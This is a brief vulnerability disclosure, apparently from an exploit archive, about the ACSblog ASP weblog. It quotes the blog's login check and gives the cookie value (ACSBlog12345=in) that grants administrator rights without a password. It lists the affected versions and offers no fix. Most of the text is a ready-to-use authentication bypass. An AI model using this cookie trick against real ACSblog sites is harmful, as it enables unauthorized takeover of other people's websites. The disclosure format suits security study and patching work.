*/ WWW.BAHADORLOVER.COM \* ACSblog : A asp weblog with manageable code blocks and logical structure make it easy for the novice to get into the code and customize it to your site. Full-featured enough for expert bloggers vendor:www.asppress.com Where is the bug ? inc_login_check.asp <% if request.cookies(cookiename)="in" then ihaveadminright=true else ihaveadminright=false end if %> --------------- Default cookiename is "ACSBlog12345" and you can create a cookie or using http headers -> ACSBlog12345=in --------------- vulnerable versions: 0.8 1.0 1.0.1 1.0.2 1.0.3 1.1 1.1.2 1.1.3 Commercial Version 3NITRO : www.bahadorlover.com
